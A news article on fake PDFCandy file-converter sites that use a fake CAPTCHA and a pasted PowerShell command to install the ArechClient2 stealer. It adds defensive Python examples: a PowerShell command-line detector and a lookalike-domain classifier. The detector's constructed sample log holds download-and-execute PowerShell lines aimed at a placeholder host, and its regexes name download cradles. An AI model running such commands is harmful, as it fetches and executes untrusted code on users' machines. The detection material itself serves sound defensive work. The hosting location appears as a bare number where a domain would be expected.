Fake PDFCandy File Converter Websites Spread Malware


CloudSEK uncovers a new malware campaign in which attackers impersonate PDFCandy.com to distribute the ArechClient2 information stealer. Learn how this scam works and how to protect yourself.

Cybersecurity researchers at CloudSEK have discovered a new campaign exploiting the popularity of PDFCandy.com, an online file conversion tool used by over 2.5 million people, including over half a million from India alone.

According to their research, shared with Hackread.com, the attackers are distributing ArechClient2 malware to steal private information such as browser usernames and passwords. ArechClient2 belongs to the SectopRAT family, has been active since 2019, and is spread through deceptive online advertising via Google Ads or fake software updates.

Reportedly, the attackers have created a fake PDF-to-DOCX converter that closely resembles the legitimate pdfcandy.com. They have gone to great lengths to copy the look and feel of the real website, using similar web addresses to trick unsuspecting users. They have "meticulously replicated the user interface of the genuine platform and registered similar-looking domain names to deceive users," CloudSEK's researchers noted in the blog post.

Once a user lands on one of these fake sites, they are immediately asked to upload a PDF file for conversion, playing on a common need of many internet users. The site even shows a fake loading animation as if a real conversion were happening, most likely to build trust.

Then, unexpectedly, it presents a CAPTCHA verification, similar to what legitimate websites use for security. This marks a critical step in the attack, where "social engineering transitions to system compromise," the report reads. In other words, the attack relies on manipulating how users typically interact with websites.

The Malicious Trap (Source: CloudSEK)

Introducing the CAPTCHA serves two purposes: it makes the fake site look more real, and it conditions users to click without thinking. Next, the website instructs users to run a command in PowerShell, Windows' built-in command-line tool, which leads to system compromise. Analysis of the command reveals a series of redirects, starting with an innocuous link and ending at a file named "adobe.zip," hosted on 1728611543, which has been flagged as malicious by multiple security services.

The archive contains a folder called "SoundBAND" with a malicious executable called "audiobitexe." The attacker chains a legitimate Windows program and a built-in Windows tool in a multi-stage attack that ultimately launches the ArechClient2 information-stealing malware.
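The chain described above (fake CAPTCHA, a pasted PowerShell command, a download that unpacks an archive and launches an executable) leaves a recognisable shape in process-creation telemetry. The following detector is an added example written for this article, not CloudSEK's code, and it does not reproduce the campaign's actual command, which the article does not print. The log records are constructed Sysmon-style lines; the indicator weights and threshold are assumptions to be tuned against a real baseline.

```python
"""
Score PowerShell command lines for the 'paste this into PowerShell' lure:
a download stage, execution of what was fetched, a hidden window, policy
bypass, and an archive-then-launch step.  Added example; the log lines are
constructed for illustration and are not CloudSEK's data or the real command.
"""
import re
from dataclasses import dataclass, field

# (regex applied to the lower-cased command line, weight).  Weights are
# assumptions: download-and-execute primitives count double.
INDICATORS = {
    "download_cradle": (r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|"
                        r"downloadstring|downloadfile|start-bitstransfer|curl|wget)\b", 2),
    "inline_exec":     (r"\b(iex|invoke-expression)\b|\|\s*&", 2),
    "encoded_command": (r"-e(c|nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}", 2),
    "hidden_window":   (r"-w(indowstyle)?\s+hidden", 1),
    "policy_bypass":   (r"-e(p|xecutionpolicy)?\s+bypass", 1),
    "archive_stage":   (r"\bexpand-archive\b|\.zip\b", 1),
    # ignore the interpreter's own image name when looking for a launched .exe
    "launch_stage":    (r"\bstart-process\b|(?<!powershell)(?<!pwsh)\.exe\b", 1),
}
THRESHOLD = 4  # assumption: a single benign indicator must not alert

# Constructed process-creation records (not real telemetry).  The first two
# mimic the lure; the rest are ordinary administrative PowerShell use.
SAMPLE_LOG = r"""
ParentImage=C:\Windows\explorer.exe CommandLine="powershell.exe -w hidden -ep bypass -c iwr http://example.invalid/a -OutFile $env:TEMP\adobe.zip; Expand-Archive $env:TEMP\adobe.zip $env:TEMP\s; Start-Process $env:TEMP\s\SoundBAND\payload.exe"
ParentImage=C:\Windows\explorer.exe CommandLine="powershell.exe -w hidden -c iex(irm http://example.invalid/x)"
ParentImage=C:\Windows\System32\cmd.exe CommandLine="powershell.exe -NoProfile -Command Get-ChildItem C:\Temp"
ParentImage=C:\Windows\explorer.exe CommandLine="powershell.exe -Command Expand-Archive C:\Users\alice\Downloads\report.zip C:\Users\alice\Documents"
ParentImage=C:\Windows\System32\svchost.exe CommandLine="powershell.exe -ep bypass -File C:\scripts\backup.ps1"
"""

CMD_RE = re.compile(r'CommandLine="([^"]*)"')


@dataclass
class Verdict:
    suspicious: bool
    score: int
    hits: list = field(default_factory=list)


def score_command(cmdline: str) -> Verdict:
    """Apply every indicator to one command line and sum the weights."""
    text = cmdline.lower()
    hits, score = [], 0
    for name, (pattern, weight) in INDICATORS.items():
        if re.search(pattern, text):
            hits.append(name)
            score += weight
    return Verdict(score >= THRESHOLD, score, hits)


def scan_log(log_text: str) -> list:
    """Return (command line, Verdict) for every record that crosses the threshold."""
    findings = []
    for line in log_text.splitlines():
        match = CMD_RE.search(line)
        if not match:
            continue
        verdict = score_command(match.group(1))
        if verdict.suspicious:
            findings.append((match.group(1), verdict))
    return findings


if __name__ == "__main__":
    for cmd, verdict in scan_log(SAMPLE_LOG):
        print(f"[score {verdict.score}] {', '.join(verdict.hits)}\n    {cmd}")
```

The two lure-shaped lines score 6 and 5; the three administrative lines score at most 1, because a lone `-ep bypass` or `Expand-Archive` is routine. In a real deployment the parent process matters as much as the command line: a PowerShell child of explorer.exe carrying a download cradle is exactly what "user pasted something from a web page" looks like.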

Fake PDFCandy websites involved in the scam (Screenshot: CloudSEK)

It is worth noting that the FBI warned on March 17, 2025, about malicious online file converters being used to distribute harmful software, so this threat is not new.

"Cybercriminals across the globe are using any type of free document converter or downloader tool. This might be a website claiming to convert one type of file to another, such as a .doc file to a .pdf file. It might also claim to combine files, such as joining multiple .jpg files into one .pdf file. The suspect program might claim to be an MP3 or MP4 downloading tool," the agency explained.

To protect against such threats, be cautious when using online file conversion services, verify a website's legitimacy before uploading files, pay attention to URLs, and be wary of unexpected prompts. In particular, no file converter or CAPTCHA ever needs you to copy a command into PowerShell or the Run dialog; that instruction is itself the compromise attempt, so close the page rather than comply.
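"Pay attention to URLs" is easier to act on with a concrete rule for what a lookalike is. The check below is an added example, not CloudSEK's or Hackread's code, and the hostnames it classifies are constructed for illustration rather than the domains CloudSEK reported. It assumes a short allow-list of brands the user actually visits, treats the last two labels as the registrable domain (no public-suffix list), and folds a small table of confusable characters before comparing.

```python
"""
Classify a hostname as legitimate, suspicious or unknown relative to a
brand allow-list.  Added example; sample hostnames are constructed and
are not the domains reported in the campaign.
"""
import unicodedata

# Assumption: the brands this user legitimately visits.
KNOWN_BRANDS = {"pdfcandy.com"}

# Visually similar substitutions; multi-character sequences fold first.
CONFUSABLES = [
    ("rn", "m"), ("vv", "w"),
    ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"),
    ("\u0430", "a"), ("\u0435", "e"), ("\u043e", "o"), ("\u0440", "p"),  # Cyrillic
    ("\u0441", "c"), ("\u0443", "y"), ("\u0445", "x"), ("\u0456", "i"),
]
MAX_TYPO_DISTANCE = 2  # assumption: one or two edits from a brand is a typosquat


def fold(label: str) -> str:
    """Lower-case, NFKC-normalise and replace confusable characters."""
    label = unicodedata.normalize("NFKC", label).lower()
    for src, dst in CONFUSABLES:
        label = label.replace(src, dst)
    return label


def levenshtein(a: str, b: str) -> int:
    """Edit distance with insert, delete and substitute all costing 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(hostname: str) -> tuple:
    """Return (verdict, reason) for one hostname."""
    host = unicodedata.normalize("NFKC", hostname.strip().rstrip(".")).lower()
    if host.startswith("www."):
        host = host[4:]
    labels = host.split(".")
    if len(labels) < 2:
        return ("unknown", "not a dotted hostname")
    # Assumption: registrable domain is the last two labels (no public-suffix list).
    registrable = ".".join(labels[-2:])
    if registrable in KNOWN_BRANDS:
        return ("legitimate", registrable)
    sld, tld = labels[-2], labels[-1]
    folded = fold(sld)
    for brand in KNOWN_BRANDS:
        bsld, btld = brand.split(".", 1)
        if bsld in labels[:-2]:  # brand.com.attacker.tld
            return ("suspicious", f"{brand} used as a subdomain of {registrable}")
        if folded == bsld and sld != bsld:  # homoglyphs or digit swaps
            return ("suspicious", f"confusable characters imitate {brand}")
        if folded == bsld and tld != btld:  # same name, other TLD
            return ("suspicious", f"{bsld} registered under a different TLD (.{tld})")
        distance = levenshtein(folded, bsld)
        if distance <= MAX_TYPO_DISTANCE:
            return ("suspicious", f"{distance} edit(s) from {brand}")
        if bsld in folded:  # brand plus extra tokens, e.g. brand-converter
            return ("suspicious", f"{brand} name embedded in {registrable}")
    return ("unknown", "no brand match")


if __name__ == "__main__":
    # Constructed samples, not the domains from the campaign.
    for sample in ["www.PDFCandy.com", "pdfcandy.net", "pdfc\u0430ndy.com",
                   "pdfcandi.com", "pdfcandy-converter.com",
                   "pdfcandy.com.example.invalid", "example.invalid"]:
        print(f"{sample:32} {classify(sample)}")
```

The order of the checks matters: subdomain abuse is tested before anything else because its registrable domain is unrelated to the brand, and the confusable test runs before the edit-distance test so a Cyrillic "а" is reported as a homoglyph rather than as a one-character typo. A browser extension or proxy rule would feed the address bar host into `classify` and block or warn on "suspicious".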
